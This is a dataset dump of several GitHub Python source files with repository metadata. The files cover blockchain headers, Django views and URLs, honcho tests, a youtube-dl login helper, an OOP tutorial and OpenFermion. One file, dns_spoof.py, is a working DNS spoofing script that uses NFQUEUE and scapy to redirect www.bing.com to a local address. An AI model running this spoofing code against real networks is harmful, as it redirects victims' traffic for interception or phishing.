blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d29a348904016924e690b825b758b20f51d24b6e
|
e82ba9700d831ddc884928eb2cc04173075561e1
|
/torba/torba/client/baseheader.py
|
339dd5e54e13fed55e625d277b9ebe4c5d76b3f3
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
raymondSeger/lbry-sdk
|
ee223d7fbfdd3495a66a457cfaf87e311eb22f44
|
bbc056eef066dfe35967b14f676b22792bbab40e
|
refs/heads/master
| 2022-02-04T11:58:03.309249
| 2019-07-19T15:26:50
| 2019-07-19T15:26:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,851
|
py
|
import os
import logging
from io import BytesIO
from typing import Optional, Iterator, Tuple
from binascii import hexlify
from torba.client.util import ArithUint256
from torba.client.hash import double_sha256
log = logging.getLogger(__name__)
class InvalidHeader(Exception):
    """Raised when a block header fails validation at a given height."""

    def __init__(self, height, message):
        super().__init__(message)
        # Keep both values on the instance so callers (e.g. connect())
        # can decide where to truncate the failing chunk.
        self.height = height
        self.message = message
class BaseHeaders:
    """Chain-agnostic store of serialized block headers.

    Headers are kept concatenated at fixed ``header_size`` offsets, either
    in a real file or in a ``BytesIO`` (when path is ':memory:'), and are
    validated chunk by chunk as they are connected.
    """

    # Chain parameters supplied by concrete subclasses:
    header_size: int      # byte length of one serialized header
    chunk_size: int       # number of headers per validation chunk
    max_target: int       # easiest (numerically largest) allowed PoW target
    genesis_hash: Optional[bytes]  # hex digest of header 0, or None to skip the check
    target_timespan: int
    validate_difficulty: bool = True  # subclasses may disable bits/PoW checks

    def __init__(self, path) -> None:
        # NOTE(review): for a real file path, self.io is only assigned in
        # open() — using the instance before awaiting open() will fail.
        if path == ':memory:':
            self.io = BytesIO()
        self.path = path
        self._size: Optional[int] = None  # cached header count; reset after writes

    async def open(self):
        # 'w+b' creates a missing file; 'r+b' preserves existing headers.
        if self.path != ':memory:':
            if not os.path.exists(self.path):
                self.io = open(self.path, 'w+b')
            else:
                self.io = open(self.path, 'r+b')

    async def close(self):
        self.io.close()

    @staticmethod
    def serialize(header: dict) -> bytes:
        # Chain-specific: encode a header dict back into raw bytes.
        raise NotImplementedError

    @staticmethod
    def deserialize(height, header):
        # Chain-specific: decode raw header bytes at the given height.
        raise NotImplementedError

    def get_next_chunk_target(self, chunk: int) -> ArithUint256:
        # Default: constant difficulty; subclasses implement retargeting.
        return ArithUint256(self.max_target)

    @staticmethod
    def get_next_block_target(chunk_target: ArithUint256, previous: Optional[dict],
                              current: Optional[dict]) -> ArithUint256:
        # Default: the per-block target is just the chunk target.
        return chunk_target

    def __len__(self) -> int:
        # Header count derived from the storage size, cached until a write.
        if self._size is None:
            self._size = self.io.seek(0, os.SEEK_END) // self.header_size
        return self._size

    def __bool__(self):
        # Always truthy: an empty store must not behave like False.
        return True

    def __getitem__(self, height) -> dict:
        assert not isinstance(height, slice), \
            "Slicing of header chain has not been implemented yet."
        return self.deserialize(height, self.get_raw_header(height))

    def get_raw_header(self, height) -> bytes:
        # Headers are stored back to back: offset = height * header_size.
        self.io.seek(height * self.header_size, os.SEEK_SET)
        return self.io.read(self.header_size)

    @property
    def height(self) -> int:
        # Height of the chain tip; -1 when the store is empty.
        return len(self)-1

    @property
    def bytes_size(self):
        return len(self) * self.header_size

    def hash(self, height=None) -> bytes:
        # Hex hash of the header at `height` (the tip by default).
        return self.hash_header(
            self.get_raw_header(height if height is not None else self.height)
        )

    @staticmethod
    def hash_header(header: bytes) -> bytes:
        # Reversed double-SHA256, hex encoded; missing headers hash to zeros.
        if header is None:
            return b'0' * 64
        return hexlify(double_sha256(header)[::-1])

    async def connect(self, start: int, headers: bytes) -> int:
        """Validate and append `headers` beginning at height `start`.

        Returns the number of headers actually written. On an invalid
        header the chunk is trimmed and the loop stops.
        """
        added = 0
        bail = False
        for height, chunk in self._iterate_chunks(start, headers):
            try:
                # validate_chunk() is CPU bound and reads previous chunks from file system
                self.validate_chunk(height, chunk)
            except InvalidHeader as e:
                bail = True
                # NOTE(review): validate_chunk raises with e.height equal to
                # the chunk start (see note there), so this slice is always
                # chunk[:0] — i.e. the whole failing chunk is dropped. If
                # e.height could exceed `height`, the sign of this slice
                # would need review ((e.height - height) keeps the valid
                # prefix; (height - e.height) does not).
                chunk = chunk[:(height-e.height)*self.header_size]
            written = 0
            if chunk:
                self.io.seek(height * self.header_size, os.SEEK_SET)
                written = self.io.write(chunk) // self.header_size
                self.io.truncate()
                # .seek()/.write()/.truncate() might also .flush() when needed
                # the goal here is mainly to ensure we're definitely flush()'ing
                self.io.flush()
                self._size = None  # invalidate cached length
            added += written
            if bail:
                break
        return added

    def validate_chunk(self, height, chunk):
        # Seed validation state from headers already stored.
        previous_hash, previous_header, previous_previous_header = None, None, None
        if height > 0:
            previous_header = self[height-1]
            previous_hash = self.hash(height-1)
        if height > 1:
            previous_previous_header = self[height-2]
        # NOTE(review): 2016 is hard-coded here instead of self.chunk_size —
        # confirm whether subclasses with a different chunk size need this.
        chunk_target = self.get_next_chunk_target(height // 2016 - 1)
        for current_hash, current_header in self._iterate_headers(height, chunk):
            block_target = self.get_next_block_target(chunk_target, previous_previous_header, previous_header)
            # NOTE(review): `height` is the chunk start and is not advanced
            # per header, so any InvalidHeader carries the chunk's first
            # height — confirm this is intended.
            self.validate_header(height, current_hash, current_header, previous_hash, block_target)
            previous_previous_header = previous_header
            previous_header = current_header
            previous_hash = current_hash

    def validate_header(self, height: int, current_hash: bytes,
                        header: dict, previous_hash: bytes, target: ArithUint256):
        # Genesis header: only compare against the configured genesis hash.
        if previous_hash is None:
            if self.genesis_hash is not None and self.genesis_hash != current_hash:
                raise InvalidHeader(
                    height, "genesis header doesn't match: {} vs expected {}".format(
                        current_hash.decode(), self.genesis_hash.decode())
                )
            return

        # Chain linkage: header must reference the preceding block's hash.
        if header['prev_block_hash'] != previous_hash:
            raise InvalidHeader(
                height, "previous hash mismatch: {} vs expected {}".format(
                    header['prev_block_hash'].decode(), previous_hash.decode())
            )

        if self.validate_difficulty:

            # Declared difficulty must match the expected compact target.
            if header['bits'] != target.compact:
                raise InvalidHeader(
                    height, "bits mismatch: {} vs expected {}".format(
                        header['bits'], target.compact)
                )

            # The hash, read as a 256-bit integer, must not exceed the target.
            proof_of_work = self.get_proof_of_work(current_hash)
            if proof_of_work > target:
                raise InvalidHeader(
                    height, "insufficient proof of work: {} vs target {}".format(
                        proof_of_work.value, target.value)
                )

    async def repair(self):
        """Scan the stored chain from genesis and truncate the storage at
        the first hash-linkage break found."""
        previous_header_hash = fail = None
        self.io.seek(0)
        batch_size = 10000
        for start_height in range(0, self.height, batch_size):
            headers = self.io.read(self.header_size*batch_size)
            for header_hash, header in self._iterate_headers(start_height, headers):
                height = header['block_height']
                if height:
                    # Non-genesis: must link to the previous header's hash.
                    if header['prev_block_hash'] != previous_header_hash:
                        fail = True
                else:
                    # Genesis: must equal the configured genesis hash.
                    if header_hash != self.genesis_hash:
                        fail = True
                if fail:
                    log.warning("Header file corrupted at height %s, truncating it.", height - 1)
                    self.io.seek((height - 1) * self.header_size, os.SEEK_SET)
                    self.io.truncate()
                    self.io.flush()
                    self._size = None
                    return
                previous_header_hash = header_hash

    @staticmethod
    def get_proof_of_work(header_hash: bytes) -> ArithUint256:
        # header_hash is a hex byte string; int() accepts the b'0x' prefix
        # together with base 16.
        return ArithUint256(int(b'0x' + header_hash, 16))

    def _iterate_chunks(self, height: int, headers: bytes) -> Iterator[Tuple[int, bytes]]:
        """Yield (start_height, chunk_bytes) pairs, aligning all chunks
        after the first to chunk_size boundaries."""
        assert len(headers) % self.header_size == 0, f"{len(headers)} {len(headers)%self.header_size}"
        start = 0
        # The first chunk is shortened so that later chunks begin at
        # multiples of chunk_size.
        end = (self.chunk_size - height % self.chunk_size) * self.header_size
        while start < end:
            yield height + (start // self.header_size), headers[start:end]
            start = end
            end = min(len(headers), end + self.chunk_size * self.header_size)

    def _iterate_headers(self, height: int, headers: bytes) -> Iterator[Tuple[bytes, dict]]:
        """Yield (hash, deserialized_header) for each header in `headers`."""
        assert len(headers) % self.header_size == 0
        for idx in range(len(headers) // self.header_size):
            start, end = idx * self.header_size, (idx + 1) * self.header_size
            header = headers[start:end]
            yield self.hash_header(header), self.deserialize(height+idx, header)
|
[
"lex@damoti.com"
] |
lex@damoti.com
|
d9543dbbf9479d52cb98637c34019ef3f722181a
|
7db6c1865cf9102808824ff06cda747b6e572a21
|
/Python/Lib/ApiWsh/api/__init__.py
|
41aa17cca0eea053eef435c89f4e7a83a28b7316
|
[] |
no_license
|
hyteer/testing
|
1f6cabc1d2b67faa4533e6ad7eb5be8c13d542c9
|
1d8b47b3bbb2daf00e4f15b5d18e86111ea4e113
|
refs/heads/master
| 2020-05-21T16:19:08.243676
| 2017-01-03T01:25:17
| 2017-01-03T01:25:17
| 60,914,071
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 382
|
py
|
# encoding: utf-8
"""Package exports: re-export the API classes listed in __all__."""
# NOTE(review): these are Python 2 implicit relative imports; porting to
# Python 3 would require `from .init_session import InitSession`, etc.
from init_session import InitSession
from shop import Shop
from common import Common
from marketing import Marketing
from utils import CommonUtils
from product import Product
from member import Member
# NOTE(review): module name 'wexin' looks like a typo of 'weixin', but it
# must match the actual file name on disk — cannot be fixed here alone.
from wexin import Weixin

__all__ = [
    "InitSession",
    "Common",
    "Shop",
    "Marketing",
    "Product",
    "Member",
    "Weixin",
    "CommonUtils"
]
|
[
"hyteer@qq.com"
] |
hyteer@qq.com
|
a6cfd0b621c47bbada59feb13b42ff40770c9170
|
c83e356d265a1d294733885c373d0a4c258c2d5e
|
/mayan/apps/announcements/views.py
|
8c1c80a96b85a9513f753a1ed3a35b6c541b84dc
|
[
"Apache-2.0"
] |
permissive
|
TrellixVulnTeam/fall-2021-hw2-451-unavailable-for-legal-reasons_6YX3
|
4160809d2c96707a196b8c94ea9e4df1a119d96a
|
0e4e919fd2e1ded6711354a0330135283e87f8c7
|
refs/heads/master
| 2023-08-21T23:36:41.230179
| 2021-10-02T03:51:12
| 2021-10-02T03:51:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,860
|
py
|
import logging
from django.template import RequestContext
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from mayan.apps.views.generics import (
MultipleObjectConfirmActionView, SingleObjectCreateView,
SingleObjectEditView, SingleObjectListView
)
from .icons import icon_announcement_list
from .links import link_announcement_create
from .models import Announcement
from .permissions import (
permission_announcement_create, permission_announcement_delete,
permission_announcement_edit, permission_announcement_view
)
logger = logging.getLogger(name=__name__)
class AnnouncementCreateView(SingleObjectCreateView):
    """Form view for creating a new announcement."""
    fields = ('label', 'text', 'enabled', 'start_datetime', 'end_datetime')
    model = Announcement
    view_permission = permission_announcement_create

    def get_extra_context(self):
        # Extra template context for the create form page.
        return {
            'title': _('Create announcement'),
        }

    def get_instance_extra_data(self):
        # Record the acting user on the instance — presumably consumed by
        # the model's event tracking; confirm against the model code.
        return {
            '_event_actor': self.request.user
        }
class AnnouncementDeleteView(MultipleObjectConfirmActionView):
    """Confirmation view that deletes one or more announcements."""
    error_message = _(
        'Error deleting announcement "%(instance)s"; %(exception)s'
    )
    model = Announcement
    object_permission = permission_announcement_delete
    pk_url_kwarg = 'announcement_id'
    post_action_redirect = reverse_lazy(
        viewname='announcements:announcement_list'
    )
    success_message_single = _(
        'Announcement "%(object)s" deleted successfully.'
    )
    success_message_singular = _(
        '%(count)d announcement deleted successfully.'
    )
    success_message_plural = _(
        '%(count)d announcements deleted successfully.'
    )
    title_single = _('Delete announcement: %(object)s.')
    title_singular = _('Delete the %(count)d selected announcement.')
    title_plural = _('Delete the %(count)d selected announcements.')

    def get_extra_context(self):
        context = {
            'delete_view': True,
        }
        # When exactly one object is selected, expose it to the template so
        # the confirmation page can name it.
        if self.object_list.count() == 1:
            context.update(
                {
                    'object': self.object_list.first(),
                }
            )
        return context

    def object_action(self, instance, form=None):
        # Called once per selected announcement by the base view.
        instance.delete()
class AnnouncementEditView(SingleObjectEditView):
    """Form view for editing an existing announcement."""
    fields = ('label', 'text', 'enabled', 'start_datetime', 'end_datetime')
    model = Announcement
    object_permission = permission_announcement_edit
    pk_url_kwarg = 'announcement_id'
    post_action_redirect = reverse_lazy(
        viewname='announcements:announcement_list'
    )

    def get_extra_context(self):
        # Extra template context for the edit form page.
        return {
            'object': self.object,
            'title': _('Edit announcement: %s') % self.object,
        }

    def get_instance_extra_data(self):
        # Record the acting user on the instance — presumably consumed by
        # the model's event tracking; confirm against the model code.
        return {
            '_event_actor': self.request.user
        }
class AnnouncementListView(SingleObjectListView):
    """List all announcements the requesting user may view."""
    model = Announcement
    object_permission = permission_announcement_view

    def get_extra_context(self):
        # Template context: hide per-object links/columns and supply the
        # "no results" help panel shown when there are no announcements.
        # Fixed typos in the user-visible (translatable) help text:
        # "convery" -> "convey", "organzation" -> "organization".
        return {
            'hide_link': True,
            'hide_object': True,
            'no_results_icon': icon_announcement_list,
            'no_results_main_link': link_announcement_create.resolve(
                context=RequestContext(request=self.request)
            ),
            'no_results_text': _(
                'Announcements are displayed in the login view. You can use '
                'announcements to convey information about your organization, '
                'announcements or usage guidelines for your users.'
            ),
            'no_results_title': _('No announcements available'),
            'title': _('Announcements'),
        }
|
[
"79801878+Meng87@users.noreply.github.com"
] |
79801878+Meng87@users.noreply.github.com
|
38e00c28fd10a054e3f45b1869c473b5a80aff1c
|
57dfd89d63b3b52eed144653c8264d50fa9fba6e
|
/consolidacion/urls.py
|
ccb88f7779bde647146b0913aaa142b06376d955
|
[] |
no_license
|
geovanniberdugo/siiom
|
c850620214a1a3b8b1fc83ab895c0601241da3b4
|
5e2b72aff7ac5e94a93b7575603114b4ea5f628a
|
refs/heads/main
| 2023-02-16T15:02:30.539674
| 2021-01-15T22:29:36
| 2021-01-15T22:29:36
| 330,036,242
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 499
|
py
|
from django.urls import re_path

from . import views

# URL namespace for this app (reverse as 'consolidacion:<name>').
app_name = 'consolidacion'

urlpatterns = [
    re_path(r'^asignar_grupo_visitas/$', views.asignar_grupo_visitas, name="asignar_grupo_visitas"),
    re_path(r'^visitas/nueva/$', views.CrearVisitaView.as_view(), name="crear_visita"),
    re_path(r'^visitas/editar/(?P<pk>\d+)/$', views.EditarVisitaView.as_view(), name="editar_visita"),
    # AJAX variant of the first route, under an /api/ prefix.
    re_path(r'^api/visitas/asignar/$', views.asignar_grupo_visitas_ajax, name="asignar_grupo_visitas_ajax"),
]
|
[
"geovanni.berdugo@gmail.com"
] |
geovanni.berdugo@gmail.com
|
8d8428dc37777f73a06a488c972c3fc9cb65d1a0
|
68cec278ee55799811b3fd9643c31bab4460457d
|
/honcho/test/integration/test_run.py
|
7195e979d11c6e3137f9562611c873eb0f1cb441
|
[
"MIT"
] |
permissive
|
BoldBigflank/honcho
|
78d03da885172a14898bf2706ce14661c1c7047c
|
bbcb4d6b466c9008c85980307317603afd3bc101
|
refs/heads/master
| 2021-01-18T09:04:10.447029
| 2016-01-26T21:55:20
| 2016-01-26T21:55:20
| 50,392,809
| 0
| 0
| null | 2016-01-26T01:05:43
| 2016-01-26T01:05:43
| null |
UTF-8
|
Python
| false
| false
| 1,318
|
py
|
import sys
import textwrap
from ..helpers import TestCase
from ..helpers import TestEnv
# Run the child scripts with the same interpreter running these tests.
python_bin = sys.executable

# Tiny program used as the honcho subcommand below: prints the ANIMAL env
# var (default "elephant") on stdout and a fixed line on stderr.
script = textwrap.dedent("""
from __future__ import print_function
import os
import sys
print(os.environ.get("ANIMAL", "elephant"))
print("error output", file=sys.stderr)
""")
class TestRun(TestCase):
    """Integration tests for the `honcho run` subcommand."""

    def test_run(self):
        # Without a .env file the script prints its default value.
        with TestEnv({'test.py': script}) as env:
            ret, out, err = env.run_honcho(['run', python_bin, 'test.py'])
            self.assertEqual(ret, 0)
            self.assertEqual(out, 'elephant\n')
            self.assertTrue('error output\n' in err)

    def test_run_env(self):
        # A .env file in the working directory is loaded into the
        # subcommand's environment.
        with TestEnv({'.env': 'ANIMAL=giraffe', 'test.py': script}) as env:
            ret, out, err = env.run_honcho(['run', python_bin, 'test.py'])
            self.assertEqual(ret, 0)
            self.assertEqual(out, 'giraffe\n')

    def test_run_args_before_command(self):
        # Regression test for #122 -- ensure that common args can be given
        # before the subcommand.
        with TestEnv({'.env.x': 'ANIMAL=giraffe', 'test.py': script}) as env:
            ret, out, err = env.run_honcho(['-e', '.env.x',
                                            'run', python_bin, 'test.py'])
            self.assertEqual(ret, 0)
            self.assertEqual(out, 'giraffe\n')
|
[
"nick@whiteink.com"
] |
nick@whiteink.com
|
a39cb4a7ba8bcae6fe139e57c54bd5c6b056a517
|
f167dffa2f767a0419aa82bf434852069a8baeb8
|
/lib/youtube_dl/extractor/gigya.py
|
412178492fe1062ac83c554617034b6df61cbabd
|
[
"MIT"
] |
permissive
|
firsttris/plugin.video.sendtokodi
|
d634490b55149adfdcb62c1af1eb77568b8da3f5
|
1095c58e2bc21de4ab6fcb67a70e4f0f04febbc3
|
refs/heads/master
| 2023-08-18T10:10:39.544848
| 2023-08-15T17:06:44
| 2023-08-15T17:06:44
| 84,665,460
| 111
| 31
|
MIT
| 2022-11-11T08:05:21
| 2017-03-11T16:53:06
|
Python
|
UTF-8
|
Python
| false
| false
| 677
|
py
|
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
urlencode_postdata,
)
class GigyaBaseIE(InfoExtractor):
    def _gigya_login(self, auth_data):
        """Log in against the Gigya accounts API and return the auth JSON.

        Raises ExtractorError (expected) when the response carries an
        error field.
        """
        response = self._download_json(
            'https://accounts.eu1.gigya.com/accounts.login', None,
            note='Logging in', errnote='Unable to log in',
            data=urlencode_postdata(auth_data))

        error = response.get('errorDetails') or response.get('errorMessage')
        if error:
            raise ExtractorError(
                'Unable to login: %s' % error, expected=True)
        return response
|
[
"noreply@github.com"
] |
firsttris.noreply@github.com
|
7b39b19ccd500ec83103a1e07e89e55b108079df
|
7a6e2a3492b6e237a70b12d75fd05b7a77472af3
|
/py/corePy/13.1_object_intrudce.py
|
7cc7f9937ce8aebe920253080fa91f4d7131c4bb
|
[] |
no_license
|
timtingwei/prac
|
e44b7e4634a931d36ed7e09770447f5dba5f25e6
|
ae77fa781934226ab1e22d6aba6dba152dd15bfe
|
refs/heads/master
| 2020-05-21T17:53:07.144037
| 2017-10-10T14:55:52
| 2017-10-10T14:55:52
| 63,440,125
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,305
|
py
|
# 13.1_object_intrudce.py
# /// instance and class
class MyData(object):
    # The quadruple quote below simply opens a triple-quoted docstring whose
    # content begins with a stray '"'; it holds commented-out code for an
    # __init__ that would set x and y. The class body is otherwise empty.
    """"
    def __init__(self):
        self.x = 10
        self.y = 20
    """
    pass
mathObj = MyData()
mathObj.x = 4  # /// x is an attribute of this instance only (added dynamically), not of the class
mathObj.y = 5
print (mathObj.x + mathObj.y)
# 9
print (mathObj.x * mathObj.y)
# 20
# /// method
class MyDataWithMethod(object):  # define a class with a method
    def printFoo(self):
        print ('You invoked printFoo()!')

myObj = MyDataWithMethod()  # create an instance
myObj.printFoo()  # call the method
# You invoked printFoo()!
# create a class
class AddrBookEntry(object):
    """Address book entry holding a name and a phone number."""

    def __init__(self, nm, ph):
        # Runs at instantiation time; announces the newly created entry.
        self.name = nm
        self.phone = ph
        print ('Created instance for:',self.name)

    def updatePhone(self, newph):
        # Replace the stored phone number and report the change.
        self.phone = newph
        print ('Updated phone # for: ',self.name)
# create instances (each __init__ prints an introduction line)
john = AddrBookEntry('John Doe','408-555-1212')
# Created instance for: John Doe
jane = AddrBookEntry('Jane Doe','650-555-1212')
# Created instance for: Jane Doe
print (john)
# <__main__.AddrBookEntry object at 0x028531D0>
print (john.name)  # print the instance's name
# John Doe
print (john.phone)
# 408-555-1212
print (jane.name)
# Jane Doe
print (jane.phone)
# 650-555-1212
# call method
john.updatePhone('415-555-1212')
# Updated phone # for: John Doe
print (john.phone)
# 415-555-1212
# create subclass
class EmplAddrBookEntry(AddrBookEntry):
    """Address book entry for an employee, adding an id and an e-mail."""

    def __init__(self, nm, ph, id, em):
        # Delegate name/phone setup to the parent class.
        AddrBookEntry.__init__(self, nm, ph)  # equivalent: super().__init__(nm, ph)
        self.empid = id
        self.email = em

    def updateEmail(self, newem):
        # Replace the stored e-mail address and report the change.
        self.email = newem
        print ('Updated e-mail address for:',self.name)
# Rebind john to an employee entry and exercise inherited and new methods.
john = EmplAddrBookEntry('John Doe','408-555-1212',42,'jogh@hotmail.com')
# Created instance for: John Doe
print (john)
# <__main__.EmplAddrBookEntry object at 0x02883490>
print (john.name)  # John Doe
print (john.phone)  # 408-555-1212
print (john.email)  # jogh@hotmail.com
john.updatePhone('415-555-1212')  # Updated phone # for: John Doe
print (john.phone)  # 415-555-1212
john.updateEmail('john@doe.spam')  # Updated e-mail address for: John Doe
print (john.email)  # john@doe.spam
|
[
"timtingwei@gmail.com"
] |
timtingwei@gmail.com
|
691d455b00d64ff5f36b32c1a00b31fec450c885
|
b3ea7a2d723d432a65748e073cae25e83441580f
|
/dns_spoof.py
|
b1b224ca654ef3801acf63b08b9e01cf3b6380b1
|
[] |
no_license
|
jcohen66/htools
|
7622aa90465abb674e8f413bab7686b26b6a99fd
|
ba8bef2a540e1c58772143b9d3446fd8c30eade7
|
refs/heads/master
| 2023-02-15T04:13:23.419561
| 2020-02-01T19:16:50
| 2020-02-01T19:16:50
| 233,474,276
| 0
| 0
| null | 2023-01-20T23:39:22
| 2020-01-12T23:24:49
|
Python
|
UTF-8
|
Python
| false
| false
| 1,143
|
py
|
#!/usr/bin/env python
# iptables -I FORWARD -j NFQUEUE --queue-num 0
# iptables -I OUTPUT -j NFQUEUE --queue-num 0
# Must do when done: iptables fllush
import netfilterqueue
import scapy.all as scapy
def process_packet(packet):
    """NFQUEUE callback: rewrite DNS answers for www.bing.com to 10.0.2.15,
    then accept the (possibly modified) packet."""
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        # target website
        qname = scapy_packet[scapy.DNSQR].qname
        # print(scapy_packet.show())
        # NOTE(review): under Python 3 scapy's qname is bytes, so the `in`
        # test against a str would raise TypeError; likewise set_payload
        # below uses str(). This script appears to target Python 2 —
        # confirm before porting.
        if 'www.bing.com' in qname:
            print('[+] Spoofing target')
            # Forge a single answer record pointing at the attacker host.
            answer = scapy.DNSRR(rrname=qname, rdata='10.0.2.15')
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            # Remove fields so scapy can recalc..
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].len
            del scapy_packet[scapy.UDP].chksum
            # Convert packet to str and replace
            # original payload.
            packet.set_payload(str(scapy_packet))
    packet.accept()
# Bind to NFQUEUE number 0 (see the iptables rules above) and run forever.
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
|
[
"jcohen66@optonline.net"
] |
jcohen66@optonline.net
|
e3ee32f2248a6378906588b43cc58abefa8e0771
|
28d5174b51d43ade5e57dc6498473e8029356b1a
|
/src/openfermion/transforms/_bravyi_kitaev.py
|
2dacc68b00b30341aa27575a0b971c01ba5b5301
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
Strilanc/OpenFermion
|
2b350ae7ea464460e1f422a59c8d7033dc5774ef
|
3a0a57b8b545acd2a2ff6b61e88f7c8a8a4437c8
|
refs/heads/master
| 2021-01-25T13:59:21.177659
| 2018-03-02T15:47:22
| 2018-03-02T15:47:22
| 123,639,421
| 1
| 0
| null | 2018-03-02T22:55:29
| 2018-03-02T22:55:28
| null |
UTF-8
|
Python
| false
| false
| 4,691
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Bravyi-Kitaev transform on fermionic operators."""
from __future__ import absolute_import
from openfermion.ops import QubitOperator
from openfermion.transforms._fenwick_tree import FenwickTree
def bravyi_kitaev(operator, n_qubits=None):
    """Apply the Bravyi-Kitaev transform and return qubit operator.

    Args:
        operator (openfermion.ops.FermionOperator):
            A FermionOperator to transform.
        n_qubits (int|None):
            Can force the number of qubits in the resulting operator above the
            number that appear in the input operator.

    Returns:
        transformed_operator: An instance of the QubitOperator class.

    Raises:
        ValueError: Invalid number of qubits specified.
    """
    # Compute the number of qubits.
    # Imported locally rather than at module level — presumably to avoid a
    # circular import; confirm before hoisting to the top of the file.
    from openfermion.utils import count_qubits
    if n_qubits is None:
        n_qubits = count_qubits(operator)
    if n_qubits < count_qubits(operator):
        raise ValueError('Invalid number of qubits specified.')

    # Build the Fenwick tree.
    fenwick_tree = FenwickTree(n_qubits)

    # Compute transformed operator: transform each term lazily, then sum.
    transformed_terms = (
        _transform_operator_term(term=term,
                                 coefficient=operator.terms[term],
                                 fenwick_tree=fenwick_tree)
        for term in operator.terms
    )
    return inline_sum(seed=QubitOperator(), summands=transformed_terms)
def _transform_operator_term(term, coefficient, fenwick_tree):
    """Transform one FermionOperator term into a QubitOperator.

    Args:
        term (list[tuple[int, int]]):
            A list of (mode, raising-vs-lowering) ladder operator terms.
        coefficient (float): Coefficient multiplying the term.
        fenwick_tree (FenwickTree): Precomputed tree over the qubit indices.

    Returns:
        QubitOperator: Product of the transformed ladder operators, seeded
        with the identity scaled by `coefficient`.
    """
    # Build the Bravyi-Kitaev transformed operators.
    transformed_ladder_ops = (
        _transform_ladder_operator(ladder_operator, fenwick_tree)
        for ladder_operator in term
    )
    return inline_product(seed=QubitOperator((), coefficient),
                          factors=transformed_ladder_ops)
def _transform_ladder_operator(ladder_operator, fenwick_tree):
    """Transform a single fermionic ladder operator into a QubitOperator.

    Args:
        ladder_operator (tuple[int, int]):
            (mode index, raising-vs-lowering flag).
        fenwick_tree (FenwickTree): Tree encoding update/parity sets.

    Returns:
        QubitOperator: Sum of the two majorana components.
    """
    index = ladder_operator[0]

    # Parity set. Set of nodes to apply Z to.
    parity_set = [node.index for node in
                  fenwick_tree.get_parity_set(index)]

    # Update set. Set of ancestors to apply X to.
    ancestors = [node.index for node in
                 fenwick_tree.get_update_set(index)]

    # The C(j) set.
    ancestor_children = [node.index for node in
                         fenwick_tree.get_remainder_set(index)]

    # Switch between lowering/raising operators.
    d_coefficient = -.5j if ladder_operator[1] else .5j

    # The fermion lowering operator is given by
    # a = (c+id)/2 where c, d are the majoranas.
    d_majorana_component = QubitOperator(
        (((ladder_operator[0], 'Y'),) +
         tuple((index, 'Z') for index in ancestor_children) +
         tuple((index, 'X') for index in ancestors)),
        d_coefficient)

    c_majorana_component = QubitOperator(
        (((ladder_operator[0], 'X'),) +
         tuple((index, 'Z') for index in parity_set) +
         tuple((index, 'X') for index in ancestors)),
        0.5)

    return c_majorana_component + d_majorana_component
def inline_sum(seed, summands):
    """Fold *summands* into *seed* using the __iadd__ operator.

    Args:
        seed (T): The starting total. The zero value.
        summands (iterable[T]): Values to add (with +=) into the total.

    Returns:
        T: The result of adding all the summands into the zero value.
    """
    total = seed
    for term in summands:
        total += term
    return total
def inline_product(seed, factors):
    """Fold *factors* into *seed* using the __imul__ operator.

    Args:
        seed (T): The starting total. The unit value.
        factors (iterable[T]): Values to multiply (with *=) into the total.

    Returns:
        T: The result of multiplying all the factors into the unit value.
    """
    total = seed
    for factor in factors:
        total *= factor
    return total
|
[
"ryanbabbush@gmail.com"
] |
ryanbabbush@gmail.com
|
89c69e1d90ba66dd187d673e41bc6ef863d979f0
|
9efe15e39ffda8391abd5a63b95e441648ba57c2
|
/comments_service/app.py
|
551ddf03f80dc3fd17554f8b88ebd2fce2b36a9a
|
[] |
no_license
|
TechAcademy-Azerbaijan/mini_microservice_app
|
3af2f80047b9a945f07ac1d4c7dd5a01980169e0
|
b06c13a7feac4b9f46ab1d3bed19e36a7de3cd4e
|
refs/heads/master
| 2023-08-15T19:49:22.058966
| 2021-10-22T08:21:40
| 2021-10-22T08:21:40
